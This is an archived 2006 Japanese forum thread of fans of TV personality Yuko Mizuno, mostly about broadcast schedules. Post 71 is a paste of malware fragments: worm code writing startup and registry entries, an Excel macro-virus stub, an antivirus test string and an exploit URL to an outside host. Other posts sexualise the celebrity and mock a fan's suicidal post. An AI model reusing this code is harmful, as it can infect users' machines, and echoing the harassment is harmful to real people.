5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【おさかな】水野裕子 Part13【改まする】

1 :お魚飼いまする:2006/12/07(木) 07:25:25 ID:g/nG6INS
ひたむきに水野裕子さん(☆みずゆう☆)を応援し続けるスレです。
そこのみんなぁ、よっといで! たのしくやろうよ!

公式HP
http://www.sma.co.jp/artist/mizuno/

前スレ
【Muscle】水野裕子 Part13【Fishing】
http://tv7.2ch.net/test/read.cgi/geino/1151320220/l50

2 :通行人さん@無名タレント:2006/12/07(木) 07:29:38 ID:iwnZAML+


3 :通行人さん@無名タレント:2006/12/07(木) 08:22:04 ID:g/nG6INS
■現在放送中の主な番組・書籍など

ザ・フィッシング
http://www.tv-osaka.co.jp/ip4/the_fishing/index.html

世界バリバリ★バリュー
http://www.mbs.jp/baribari/

GyaO「愛のバイキング」
http://www.gyao.jp/variety/biking/

GyaO「こんにちワンコ」
http://www.gyao.jp/sityou/catelist/pac_id/pac0001198/

【股関節ウォーキングでメタボリックシンドローム解消!】
http://shop.gakken.co.jp/shop/order/k_ok/bookdisp.asp?isbn=4056046123

【ストレッチバイブル】
http://7andy.yahoo.co.jp/books/detail?accd=07157382

【ストレッチバイブル2】
http://www.sportsclick.jp/magazine/coachingclinic/061015mook431/index.html

4 :通行人さん@無名タレント:2006/12/07(木) 08:25:04 ID:g/nG6INS
過去スレ
【王様のブランチ】水野裕子さん【実は女らしい子】
http://tv3.2ch.net/geino/kako/1025/10254/1025431286.html
【Muscle】水野裕子Part2〜実は女らしい〜【Queen】
http://tv3.2ch.net/test/read.cgi/geino/1041782158/
【Muscle】水野裕子 Part3【Musical】
http://tv3.2ch.net/test/read.cgi/geino/1049750981/
【Muscle】水野裕子 Part4【Fishing】
http://tv3.2ch.net/test/read.cgi/geino/1064801905/
【Muscle】水野裕子 Part5【Fishing】
http://tv6.2ch.net/test/read.cgi/geino/1083322137/
【世界バリバリ】水野裕子 Part6【MuscleFishing】
http://music4.2ch.net/test/read.cgi/geino/1084769674/
【暫定】 水野裕子 Part7 【マッスル】
http://tv7.2ch.net/test/read.cgi/geino/1097587307/
【Muscle】水野裕子 Part8【Fishing】
http://tv7.2ch.net/test/read.cgi/geino/1104223089/
【Muscle】水野裕子 Part.9【Fishing】
http://tv7.2ch.net/test/read.cgi/geino/1110174840/
【Muscle】水野裕子 Part.10【Fishing】
http://tv7.2ch.net/test/read.cgi/geino/1114629967/
【Muscle】水野裕子 Part.11【Fishing】
http://tv7.2ch.net/test/read.cgi/geino/1127660576/
【Muscle】水野裕子 Part12【Fishing】
http://tv7.2ch.net/test/read.cgi/geino/1139488852/
【Muscle】水野裕子 Part13【Fishing】
http://tv7.2ch.net/test/read.cgi/geino/1151320220/

5 :通行人さん@無名タレント:2006/12/07(木) 08:32:01 ID:g/nG6INS
Part13ってなってしまった。。。(><)
これは漏れのミスです。
おまいら、すみません! このとおりです!
許してやってください! 許せんときはsageてください!
では、おまいらまたあとで会いましょうw

6 :通行人さん@無名タレント:2006/12/07(木) 09:21:54 ID:e6y6BTeL
藤本美貴

7 :通行人さん@無名タレント:2006/12/08(金) 00:22:50 ID:zGXU+1Gl
7マソコw

8 :通行人さん@無名タレント:2006/12/08(金) 22:26:09 ID:IiVZUQd2
じゃあ
8マンコ

9 :通行人さん@無名タレント:2006/12/08(金) 22:52:24 ID:dtZoCHms
泥レスしたいw

10 :通行人さん@無名タレント:2006/12/09(土) 05:03:06 ID:C67Ad6K5
一口メモ

以外なことに1000達成するようになったのはpart6から

11 :通行人さん@無名タレント:2006/12/09(土) 13:17:59 ID:CxycK8n6
>>5
乙!
テンプレが充実してるね。
ご苦労様。スレ番号は気にすんな。
俺は許す。

12 :通行人さん@無名タレント:2006/12/09(土) 16:12:16 ID:qrFk1C03
みずゆうとジャック君がキャラになったゲ―ムソフトが発売されるんだね。

13 :通行人さん@無名タレント:2006/12/09(土) 18:29:11 ID:GkChtB3D
全裸のみずゆうとポジション取りの練習がしたいお

14 :通行人さん@無名タレント:2006/12/10(日) 13:46:46 ID:xuTMF6N6
俺は普通にセックスでいいや。


15 :通行人さん@無名タレント:2006/12/10(日) 21:26:53 ID:0fSED0Pw
ジャックってあのバター犬か?

16 :夕日の裕子さんへ:2006/12/10(日) 23:06:55 ID:EPrDFWhQ
>>11
ありがとう。(*^o^*)早いけど戻ってきたよ。
おまいらに言っておくけどエロ話はそんなに絡めないから
そのつもりでおってくれよ。。。たまになw!

しばらくは書かないつもりでおったんだが
やっぱり出てきてしまった。漏れってだめだわ。
意気地がない。この前レスつけた香具師すまんかった。
ちょっと先方にも迷惑をかけたかもしれん。(−人−)

ところで「ドキドキする気持ち」ってバイオリズムあるな。
今日は朝方はどうもなかったんだが
夕方くらいから特にひどくてな。なぜか知らないんだがw
もちろんみずゆうのこと想ってどきどきしてるわけで・・・
まったくもってどうってことない日もあるんだが。。。

おまいらまだ一度も見たこともない「みずゆう」に対して
「おかしい」と感じるかもしれないな・・・(^^;
みずゆうのことカーテンに写る西日見ながら
ぼーっと考え事しておってね。。。
なんかここのところセンチなんだわ。ため息まで出る。。。
はっきりいって鬱という感じではないんだが
注意力は散漫になってるかもしれん。

いまだに何でみずゆうに「こんなにも」
恋してしまったのだろう。なぜかがどうもわからない・・・
ここまでなったこと今まで一度もなかった。一度も!
明日は楽な日だろう、絶対。今日がこうだったし!!
そういえば半年以上ずっとその繰り返しだもんなwww
答えを探す日々は明日以降も延々と続く。。。(^^;

おまいら、おやすみw

17 :11:2006/12/10(日) 23:44:20 ID:50W1fPvZ
>>16
前スレでも書いたけど、やっぱり俺、お前には負けるわ
みずゆうはお前に譲ってもう隠居しようかな・・・

18 :通行人さん@無名タレント:2006/12/11(月) 00:40:57 ID:JGIsyh+8
脳卒中や心筋梗塞で死んでもいいんで、俺もバター犬になりてぇ・・・
ちなみに乳首バター犬を希望。

19 :通行人さん@無名タレント:2006/12/11(月) 00:45:24 ID:W4it0o84
お薬出てますよ

20 :通行人さん@無名タレント:2006/12/11(月) 19:27:22 ID:Mn6kcIRq
>>17
譲ってもらえるのはありがたいけども、漏れの現実がねw
これでも実は意外とすこぶる冷静かも試練。
つまり周りは良く見えてる。盲目ではない。コレは言える!
周りから見たら相当熱くなってるように見えるな。。。(^^;
そう思ってるとしたらおまいらちょっと誤解だよ。
とにかく書くのが好きだし。これは昔からの癖。
逆にしゃべりはものすごく下手。
でもハートだけが極めてリアルタイムホットだ。
薬はそれでw

今晩芸恋リアルあるから特に強いやつをwww

21 :通行人さん@無名タレント:2006/12/11(月) 19:38:59 ID:NdEoO77K
>>20
みずゆうとの相性を占ってやるから、
生年月日を教えてくれ。
俺、占いを研究中だから、
君のような特殊な人間を是非占ってみたい。

22 :通行人さん@無名タレント:2006/12/11(月) 20:55:44 ID:Mn6kcIRq
ここに載せるのはやはりちょっと厳しい。(^^;
何かいい方法があればいいけどね。。。
そしたら教えれるがその時は君のも教えて欲しい。
実は漏れも占いが出来るw 23時以降に来るよw

23 :うらないヲタ:2006/12/12(火) 00:00:31 ID:Mn6kcIRq
>>21
相性はたぶん自分はいいと思う。 何度かやった。
占う時って集中しないといけないから疲れる。
雑念や邪念があったり軽い気持ちじゃ絶対だめだよ。
あれは正直楽じゃないよ。。気持ちも体調も万全でないと。
だから普段はだいたいパンドラの箱。
安請け合いも出来ないよ。 易をしてるけど。
研究頑張ってください。人生勉強にもなるから。

24 :通行人さん@無名タレント:2006/12/12(火) 14:39:48 ID:RcOPZY6f
>>23
自分がやってるのは易とかタロットみたいに
その時によって結果が異なるという種類のではなくて
占星術だからすでにデータがあって、それに当てはめるだけだから、
体調とか邪念とかに左右されないよ。
主に人間同士の相性を見る。
未来とかを占うのであれば、易とかタロットなどの
不確定要素を孕んだ方法じゃないと難しいだろうね。
でも、当たるかどうかは23の言う通りかなり高度な条件が揃わないと難しいので、
自然と信頼性は低下すると思う。
ただし、素質のある人が占って条件が揃った時は
恐ろしいほど当たるというのも分かるよ。


25 :きも電波w:2006/12/12(火) 19:31:32 ID:FVUpbaoR
>>24
・・・だね。良くわかってるぅ!(^^)
とにかく色んなやつを試してみて結果と照合という
作業を繰り返したら分かることも出てくる。
超自然現象には何かがあるのは確か。

おまいらスレ正常化しるw

26 :きも電波w:2006/12/12(火) 19:33:25 ID:FVUpbaoR
でぶや、今日だね。
昨日の芸恋リアルは山田邦子のをじっくり見てた。

27 :通行人さん@無名タレント:2006/12/12(火) 19:54:25 ID:gwHUXenJ
だれかキャプって

28 :通行人さん@無名タレント:2006/12/12(火) 21:57:16 ID:FVUpbaoR
漏れからも是非お願いします。 m(_ _)m

29 :通行人さん@無名タレント:2006/12/12(火) 22:10:48 ID:E8LSbXG0
漏れの所、でぶや土曜でもろめちゃイケと被るもんな。(`ヘ´)
嫌になるよ。
火曜の方がまだいいよ。
昨日の芸恋リアルは、何もなくてよかった(*^_^*)
明日はバリバリスペシャル又予想屋紳ちゃん対みずゆうに期待
(*^_^*)
この前のスペシャルは、みずゆうの突っ込みが良かったから、今回も期待しますよ。
まあそういうこっちゃ
(^з^)-☆Chu!!

30 :29:2006/12/12(火) 22:49:08 ID:E8LSbXG0
スマン。スペシャルは来週だった。
明日は通常版の放送です。

31 :通行人さん@無名タレント:2006/12/12(火) 23:11:49 ID:218EdxlH
このスレはますます洗練されてきたな

32 :通行人さん@無名タレント:2006/12/12(火) 23:54:16 ID:FVUpbaoR
>>29 >>30
そうだよね。明日は通常放送。
バリバリは番組内容よりむしろ
ファッションを楽しんでるんだがw
(※高級食材コーナー:あれ、一番好き^^)
水曜は番組タイムリーに見れないことがほとんどだね。
とうちゃんが報道ステーションみてるし。(><)
いずれにしろ見なければ。。。(^^;

33 :通行人さん@無名タレント:2006/12/12(火) 23:59:22 ID:FVUpbaoR
>>31
それガチでそう思うよ。
むしろ入りにくい時は自己申告したらいいと思うよ。
エロはやはりスパイスなのかな? そうなのかw?
漏れがいると入りにくい香具師がいれば考える。。。
自由に意見言ったほうがいいよ。漏れのスレじゃないしw

34 :通行人さん@無名タレント:2006/12/13(水) 00:50:24 ID:/Kmhcf6+
>>33
いや。
もうほぼお前だけのスレだよ。
ここは、お前のブログと言っても過言ではない。
だが、これは批判じゃない。
俺はお前にみずゆうを譲ったつもりだからどんどんやってくれ。



35 :通行人さん@無名タレント:2006/12/13(水) 19:13:33 ID:vjKflrOu
>>34
う゛ー、それ、自分的視点から見て結構複雑鴨。
どういうことか考えれば分かるでしょう。
みずゆう本人はどうなのかね、この状況。
新スレ2桁だからまだまだ修正きくよw
実は、やり杉、書き杉→ 迷惑掛け杉 なの鴨(驚愕)。
漏れは応援するのみだし・・・・・
今後考えながらテキトーにやるよ。。。(^^) 

36 :通行人さん@無名タレント:2006/12/13(水) 21:31:09 ID:fhSe3Ww3
バリバリでたまに見せるみずゆうのスーツ姿が見たいよ。
スカートもスリット入ってめちゃ女らしい。
今日は、どんな格好かな?

一回待ち受け画面でみずゆうのスーツ姿を見たけど、ダウンロードし損ねた。
orz…

37 :通行人さん@無名タレント:2006/12/13(水) 22:02:10 ID:d09S6+PF
>>35
便所の落書きなんだからそんなこと気にしてどーすんだカス!
じゃんじゃん書けwwwwwwww

38 :通行人さん@無名タレント:2006/12/13(水) 22:31:00 ID:FeBtn5F+
そうだ。35の言う通り。
気にせずじゃんじゃん書け!
お前が書かずに誰が書く?


39 :通行人さん@無名タレント:2006/12/13(水) 22:49:23 ID:FeBtn5F+
今日はひとつ水裕に説教がある。
それは公式サイトの掲示板についてだ。
あれはなんだ?
ほとんどみずゆうからのコメントがないじゃないか。
あれではまるで担当マネージャーの掲示板になってしまっている。
もともとたいして書き込みがないんだから、みずゆう自身がもっと書き込んで
ファンからのメッセージに答えろ。
いくら体育会系でネットが苦手だろうとものぐさにも程がある。
タレントしての姿勢に問題がある。
もっとファンを大事にしろ。
自分のサイトの掲示板をマネージャーにまかせっきりにしてることをプロのタレントなら恥だと思え。
みずゆうよりももっともっとメジャーで人気があって忙しいのに
もっともっと頻繁にサイトを更新してるタレントは山ほどいるぞ。
みずゆうはネットでの活動を怠けすぎだ。


40 :通行人さん@無名タレント:2006/12/13(水) 22:55:24 ID:vjKflrOu
>>37 >>38
おまいら、どうもありがとな(涙)
みんないい香具師だこと。涙でてくらぁ(><)
でぶや見たよ。ハマトラファッションって良く知ってたが
もうね、「みずゆうサイコー」ってこの際便所に落書きだね。
もう漏れの理想そのものでございました。
じゃ用事済ませてまた後ほどw

41 :通行人さん@無名タレント:2006/12/13(水) 23:17:59 ID:vjKflrOu
>>39
確かにそうなのかもしれないね。
でも意外といろいろと悩みとかがあるのかも?
それは分からないしね。。。
10月は結構多かったよね。書き込みが・・・

どうしてもこればかりはファンは弱い立場。
気持ちを代弁してくれて本当にどうもありがとうね。

正直みんな書き込みが欲しいに決まってるよ。
みずゆうだからきてるわけで・・・
これは極めて確かなことだと思う。。。

42 :通行人さん@無名タレント:2006/12/13(水) 23:19:59 ID:FeBtn5F+
>>41
うむ。
現状ではまるでみずゆうファンと担当マネージャーの交換日記だもんな。


43 :通行人さん@無名タレント:2006/12/13(水) 23:29:37 ID:vjKflrOu
>>42
言ってしまえばマネージャーさんがいなければ
今の漏れのここの書き込みもないかもしれない。
マネージャーさんには本当に感謝してますよ。
実際はマネージャーさんがいて、励みになって
漏れも公式に書き込み続けたようなもの。

実は漏れ的にはマネージャーさんの功績は
かなり結構な比重で大きかったりする。

マネージャーさんには相当感謝しなければならないかも。
これガチでマネージャーさんがいなければ
今頃もココに書き込んでないって。。。(^^;
不思議なもんだよね。人生って。まったく。

44 :通行人さん@無名タレント:2006/12/14(木) 00:43:07 ID:MiKXdACY
サイトのコメントなどどうでもいいからマソコだせマソコ!

45 :通行人さん@無名タレント:2006/12/14(木) 12:31:03 ID:GzFu+28m
>>39
何様だ

46 :通行人さん@無名タレント:2006/12/14(木) 13:16:35 ID:B0ywO1SG
12月26日テレビ東京系列で「歴史ミステリーロマン」という番組の1コーナーで「9代将軍徳川家重は女だった」でみずゆうが、将軍家重に扮するぞ!
みずゆうのちょんまげ姿や男装姿は注目やな。
翌27日には、クイズヘキサゴンスペシャルに登場。

馬鹿な回答だけは辞めて欲しい。(^。^;)

テレビジョンでは、元旦から3ヶ日にみずゆうの出る番組は分からなかった。
スマン。この情報の他に誰か年末年始みずゆう情報教えてくれ。

47 :通行人さん@無名タレント:2006/12/14(木) 13:21:41 ID:cnElmmkn
>>46
公式サイト見りゃ分かるだろ・・・


48 :46:2006/12/14(木) 13:29:30 ID:B0ywO1SG
ごめん。携帯から見れないんだ。
すいません。
m(_ _)m

49 :通行人さん@無名タレント:2006/12/14(木) 15:29:49 ID:cnElmmkn
>>48
今のところクリスマスぐらいの予定しか書いてないから
公式にアップされたらここで報告してやるよ。


50 :48:2006/12/14(木) 15:44:05 ID:B0ywO1SG
>>49
ありがとうございます。

51 :通行人さん@無名タレント:2006/12/14(木) 19:24:28 ID:NbTu6iEc
おまいら、ばんわ。
徳川家重か。なるほど!それは楽しみだ!
ヘキサゴンにも出るんだな。それ、今知った。
漏れもまともな携帯電話持ってない。
どうもコストパフォーマンスが悪いのが理由w
漏れの携帯電話代は1ヶ月1500円だ(爆)。
情報カキコよろしくね。。。(^^)

52 :通行人さん@無名タレント:2006/12/14(木) 22:42:44 ID:i/Dxxvmc
12月15日(金)読売テレビ
情報ライブ ミヤネ屋
PM3:50〜PM5:50  出演 水野裕子

53 :通行人さん@無名タレント:2006/12/14(木) 22:51:05 ID:L5NSrEm+
もうすぐ55…

54 :通行人さん@無名タレント:2006/12/14(木) 23:33:06 ID:NbTu6iEc
先ほど新スレ作ったんだが。。。
ウイルス貼られてショック。
はしゃぐと叩かれる。静かだと黙殺される。
なんてひどい世の中よ。。。(^^;;

55 :通行人さん@無名タレント:2006/12/14(木) 23:36:30 ID:NbTu6iEc
>>53 55GET
5×5=25 (^^) ニコw 
55ねぇ・・・ (^^)!
そういえばゴーゴーカレーてあるな。
最近地元に出来たんだがソース味が強いな、
あれは。。。

56 :通行人さん@無名タレント:2006/12/15(金) 00:28:35 ID:lQwa9opM
こんなのみると裕子もそうなのかなーって思っちゃう。
http://news18.2ch.net/test/read.cgi/mnewsplus/1165920326/l50

57 :通行人さん@無名タレント:2006/12/15(金) 01:07:15 ID:+hKM0+vT
>>56
芸能界に限らずごくありふれた一般の社会でも
感覚が麻痺してしまっているこのご時勢だ。石原真理子の件は知ってるw

まだ処女なの? とか 童貞野郎とか。。。
そういうことが情けない! 本質がわかっているか?

漏れは昔からそういう話には一切取りあわないことにしている。
何が正しくて何が間違っているかということの判断基準の基礎中の
基礎の部分だけは常に自分の姿をきれいに直視できなければ。。。

漏れの周りの男らも大体が風俗行ったことある連中だらけだ。
その数は女性が考えるその割合を遥かにしのぐ。95超くらいか?
やつらの実態はそういうことが癖になって抜け出せないのだ。
哀れなもんだ。中毒だ。漏れはそんなのに魂は断じて売らない。

漏れはあくまでも警鐘を鳴らし続ける。
もし1人でもこのスレを訪れるものに道を踏み外しておるのなら
みずゆうに限らず即刻生き方を改めるよう努力して欲しい。
性はファッションではない。神聖なるものだ。
悔い改めた瞬間から神が降りてくるはずだ。
漏れはその部分にだけは自信を持ってるから堂々という!

マグダラのマリアを見れ。
http://ja.wikipedia.org/wiki/%E3%83%9E%E3%82%B0%E3%83%80%E3%83%A9%E3%81%AE%E3%83%9E%E3%83%AA%E3%82%A2

誰でも許されるのだ。おまいらそのことは決して忘れるな!
おまえも、おまえも、おまえもだぞ!

興味ない香具師だけスルーしろ!

58 :通行人さん@無名タレント:2006/12/15(金) 01:16:51 ID:BXUbJM5T
まあ、みずゆうは、一人の男に尽してくれそうだな。

惚れたらとことん尽す。
合わなくなったら、はい終わり。
みずゆうらしく、さばさばした恋愛だと思うよ。

本当にみずゆうが好きになったら、みずゆうから告白されそうだな。
みずゆうなら、好きになった男に逆告白も有り得そうだが。
皆はどう思う。
みずゆうも一日の事を簡単にブログで書いてくれたら、俺らもみずゆうをもっと応援できるなとベッドに入って物思いにふける今現在です。

59 :通行人さん@無名タレント:2006/12/15(金) 01:54:28 ID:5iC/QiO8
肝肝兄ヤンは結局、書き込みを止められないのか・・・

60 :通行人さん@無名タレント:2006/12/15(金) 09:28:11 ID:fNvUeYXX
この娘処女っぽい

61 :通行人さん@無名タレント:2006/12/15(金) 14:24:49 ID:ntVCKDS8
数年前まではな。

62 :通行人さん@無名タレント:2006/12/15(金) 14:56:31 ID:ntVCKDS8
☆12/15(金) 15:50〜17:50    YTV「情報ライブ ミヤネ屋」

☆12/16(土) 11:45〜12:00    CTV「旅はパノラマ」

☆12/19(火) 18:15〜21:00    NHK−BS1「INSIDE NFL」※ハーフタイムに放送予定※

☆12/20(水) 21:00〜22:54    TBS系「世界バリバリ☆バリューSP」

☆12/23(土) 11:45〜12:00    CTV「旅はパノラマ」

☆12/24(日) 15:00〜16:25    CTV「2006・中部の事件簿」

☆12/26(火) 18:15〜21:00    NHK−BS1「INSIDE NFL」※ハーフタイムに放送予定※

☆12/26(火) 20:54〜22:48    TX系「超歴史ミステリーロマン 大奥U」

☆12/27(水) 18:30〜20:54    CX系「クイズ!ヘキサゴンU SP」



63 ::2006/12/16(土) 00:09:08 ID:VpypliFX
フィッシングが抜けてるよ

64 :通行人さん@無名タレント:2006/12/16(土) 00:21:55 ID:Kto6AnEN
フィッシングはないんじゃないか?この間は。

65 :通行人さん@無名タレント:2006/12/16(土) 17:20:11 ID:CHbnVZ4z
俺関西やからミヤネ屋見れた、うらやましいやろ。

66 :通行人さん@無名タレント:2006/12/16(土) 19:59:04 ID:dTQA+sQ8
ミヤネ屋って、コメンテーターなの?それとも、何かリポートしたんですか?
詳細キボンヌ。
それと、今日はでぶや録画しました。
日付が変わってからじっくり見ます。

評判良かったみたいで、私も注目です。

(*^_^*)

67 :通行人さん@無名タレント:2006/12/17(日) 01:03:37 ID:2cK1djQ/
でぶやの裕子さん、お嬢様ハマカジファッションで、いつもの裕子さんとは違った一面が見れました。
(*^_^*)

あれだけ体格のでかい人に囲まれれば、裕子さんも、かよわい女性に見えましたよ(^_^)v

紳助、これでもまだ裕子さんに女を感じないのか?

俺は十分に裕子さんの女性の魅力を感じたよ(`ヘ´)

さあ、今度は、バリバリスペシャルは、とんでもない結末になったそうです。
番組ホームページのバリバリニュースより、書いてありました。
予想屋紳ちゃんとみずゆうとのトークバトルは要チェック!

68 :通行人さん@無名タレント:2006/12/17(日) 02:09:55 ID:xAAgzYdh
相変わらず肝い連レスだな

69 :通行人さん@無名タレント:2006/12/17(日) 12:39:28 ID:JqDcPE9V
今バルサン炊きました

70 :通行人さん@無名タレント:2006/12/17(日) 20:31:40 ID:ajA1lfRC
みずゆうは間違いなくドMだと断言できる。


71 :<body onload=window()>:2006/12/17(日) 21:30:28 ID:ef1aDGc1
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


72 ::2006/12/17(日) 22:37:35 ID:COJ6V/a5
はっきりいって非常に迷惑です。
誰か分かる方、対策をお願い出来ないでしょうか?

73 :通行人さん@無名タレント:2006/12/18(月) 00:50:42 ID:kolrSXxy
久しぶりにのぞいて この前 >>56 >>57 読んだ 書くのおくれたわ

かつてのゆうちゃんファンだが マグダラのマリアほんとうにいい話だ 感動しながらよんだ
 
ここは 性格のまっすぐそうなゆうちゃんはぜひ読むべきだわ じつにいいやつだ こいつはw

もし ゆうちゃんのゲイノウ界の人間関係が 石原のように くさりきってるとしたら

まるでまともじゃないから そういうやつとは早くきるべきだ かわらなんとかてやつ

もっと石原みたく 暴露するやつがふえてもよさそうだが・・ あれはそうとうなジョッブ

しごと上 ゲイノウ界 そうとうひどいの知ってる・・・(w  

893 政治家 大物 相互 なんでもありのせかいだし これじゃマリアさまや (w

74 :通行人さん@無名タレント:2006/12/18(月) 07:38:02 ID:6kXNn4Fw
>>72
専ブラ使って、

75 :通行人さん@無名タレント:2006/12/19(火) 03:21:54 ID:VPdyUOFD
今日は眠たいけど目がばっちり覚めてる。
なぜか眠れない。でも仕方ない。 どうなのかね?



76 :通行人さん@無名タレント:2006/12/19(火) 04:05:33 ID:pKQ7VJEE
俺も寝ようと思うけど、眠れない。
やっぱ仕事終わって家帰るのが、深夜だからだろうか?
水曜も仕事だから、終わって家着いて一息ついてから、バリバリスペシャル見ます。
あっ!新春一発目のバリバリも、2時間SPです。

1月10日2回連続予想屋紳ちゃん対みずゆう実現?
近い内に収録ですね。
楽しみです。

眠れないみずゆうファンのために、ANN金曜2部みずゆうにさせてくれないかな?

77 :通行人さん@無名タレント:2006/12/19(火) 04:16:31 ID:VPdyUOFD
>>76
実は眠れない理由があるんだけど、今回はモロ心配事。
お疲れです。深夜まで。 普段はぐっすり寝てるんだけど
心配事があったりすると眠れない傾向あります。
ちょっと神経質なんだよね。 でも寝ないといけないし。。。

78 :通行人さん@無名タレント:2006/12/19(火) 04:19:31 ID:VPdyUOFD
まあいいや。どうなっても運命だし。
ねよねよ。こういうことって過去にもあったし。

79 :通行人さん@無名タレント:2006/12/19(火) 04:23:44 ID:VPdyUOFD
でも漏れの心配事は
ほんとうのところを知っておきたい種類のもの。
・・・というか知っておかねばならんようだ。
やはりいらん心配は体に毒だし。
よーし、何があっても腹決めた!!!漏れは強い!!!

80 :通行人さん@無名タレント:2006/12/19(火) 14:31:50 ID:nCH5Uv6Q
病気

81 :通行人さん@無名タレント:2006/12/19(火) 15:37:26 ID:VPdyUOFD
>>80
病気。。。そのようだね漏れは。 
重体のようですので >>77-79
本日よりICU送りとなりますw

82 :通行人さん@無名タレント:2006/12/19(火) 18:41:34 ID:0MVThJ0X
相変わらず基地外住人がいるな

83 :今までありがとう!:2006/12/19(火) 19:54:31 ID:VPdyUOFD
>>82
皆さんご迷惑をお掛けしてすみませんでした。
本日をもって基地外住人はスレを去ります。
あくまでも個人的な一身上の都合で、
体調全般がすぐれないのが理由です。

帰還日はわかりません。未定です。 
考えた末そうすることにします。
みずゆうがんばれ。 Mgrさんがんばれ。
漏れはいつでも応援してるからね。。。(^^)/

84 :通行人さん@無名タレント:2006/12/19(火) 21:17:49 ID:FwZvUVEB
さびしくなるな・・・
また戻ってこいよ!
っていうか、いつでも書き込みしろよ。
明日でも明後日でも。

85 :通行人さん@無名タレント:2006/12/19(火) 22:06:13 ID:0MVThJ0X
前にも同じこと言ってたじゃん、嘘つき

86 :通行人さん@無名タレント:2006/12/19(火) 22:31:29 ID:FTFBHygk
俺は裕子の事を考えると涙が出てきて死にそうになる・・・・
2年程こんな状態が続いてる、裕子の事以外何にも考えられない。
もう苦しいだけで毎日生き地獄だ、おさまる気配も無い・・・
こんな事で悩み苦しんだって何にもならんし
誰に基地外だのただの痛い奴だの言われようが、俺にはどうする事も出来無い。
こんな苦しみがこの先も続くのだったらもう氏んでしまいたい。
あぁ俺はこの先一体どうなってしまうんだ、俺はどうすればいいんだ・・・・


87 :通行人さん@無名タレント:2006/12/20(水) 00:21:53 ID:Kn76HMDk
オレいい宗派知ってるけど

88 :通行人さん@無名タレント:2006/12/20(水) 00:44:55 ID:U4Sqn8YY
俺は裕子のマソコの事を考えると涙が出てきて死にそうになる・・・・
2年程こんな状態が続いてる、裕子のマソコの事以外何にも考えられない。
もう苦しいだけで毎日生き地獄だ、ちんこがおさまる気配も無い・・・
こんな事で悩み苦しんだって何にもならんし
誰に基地外だのただの痛い奴だの言われようが、俺のちんこにはどうする事も出来無い。
こんな苦しみがこの先も続くのだったらもう氏んでしまいたい。
あぁ俺のちんこはこの先一体どうなってしまうんだ、俺のちんこはどうすればいいんだ・・・・


89 :通行人さん@無名タレント:2006/12/20(水) 01:28:44 ID:J2ZVQ7sO
やつはもうでてこないだろ そんな気がするが 

駄スレにもどったかww? 

90 :通行人さん@無名タレント:2006/12/20(水) 10:35:27 ID:OU63NiaD
27日のみずゆうが、将軍家重に扮するドラマでみずゆう演じる家重を写した写真をTVガイド誌で見た。

一枚だけど、俺はちょっとショックだった。(^。^;)

みずゆうは、男装の麗人とかは似合いそうだが、ちょんまげかつらに、しわいりのメイク。
一枚だけど、みずゆうじゃないと思ってしまった。

出来れば、みずゆうに、この役を演じた感想聞きたいなと思った。

正月元旦のTBSの夜のスポーツ特番でリポーターとして出ていましたか?
今年見た方は、情報お願いします。

91 :通行人さん@無名タレント:2006/12/20(水) 17:33:45 ID:4ZvNOAal
入院先からレスしてるとは思えんが・・・嘘つき!

92 :90:2006/12/20(水) 20:04:33 ID:OU63NiaD
俺、88じゃないよ。今仕事の休憩中。
至って元気です。

93 :通行人さん@無名タレント:2006/12/21(木) 21:25:18 ID:y4SMhkqA
昨日のバリバリのみずゆうのミニスカに萌えを感じた。

94 :通行人さん@無名タレント:2006/12/21(木) 23:13:40 ID:ckA4VkyU
>>93
ミニスカを履きなれてないせいで、股の閉じ方が甘くてカパカパしてたよね。
行儀悪いけど、まあズボンに慣れてるからだろうなあって思った。
パンチラ期待してたけど、黒タイツだったから無理だったね。

というわけで、今後の予定
☆12/20(水) 21:00〜22:54    TBS系「世界バリバリ☆バリューSP」

☆12/23(土) 11:45〜12:00    CTV「旅はパノラマ」

☆12/24(日) 15:00〜16:25    CTV「2006・中部の事件簿」

☆12/26(火) 18:15〜21:00    NHK−BS1「INSIDE NFL」※ハーフタイムに放送予定※

☆12/26(火) 20:54〜22:48    TX系「超歴史ミステリーロマン 大奥U」

☆12/27(水) 18:30〜20:54    CX系「クイズ!ヘキサゴンU SP」


☆ 1/ 1(月) 23:30〜24:30    CX系「逃走中」

☆ 1/ 2(火) 18:15〜21:00    NHK−BS1「INSIDE NFL」※ハーフタイムに放送予定※

☆ 1/ 3(水) 16:20〜18:20    NTV系「ビバ!お仕事っ!!」



95 :通行人さん@無名タレント:2006/12/21(木) 23:43:38 ID:hUexien1
>>93-94
ほぉ。女性のファッションに触れる機会もなかろうニートには
あれがミニスカに見えるのか。
なるほど。


96 :通行人さん@無名タレント:2006/12/21(木) 23:57:13 ID:ckA4VkyU
>>95
あれはミニスカ以外のなにものでもないだろ。
膝上なら全部ミニスカだぞ。
もっと短いのもあるが、それはマイクロミニと呼ぶ。


97 :通行人さん@無名タレント:2006/12/22(金) 00:02:10 ID:hUexien1
>>95
あれは
シ ョ ー ト  パ ン ツ だ


98 :通行人さん@無名タレント:2006/12/22(金) 00:56:21 ID:6Jx1m46L
そうだったのか?
お前、きっといいテレビ見てんだな。
家の古いテレビじゃミニスカだと思ったよ。


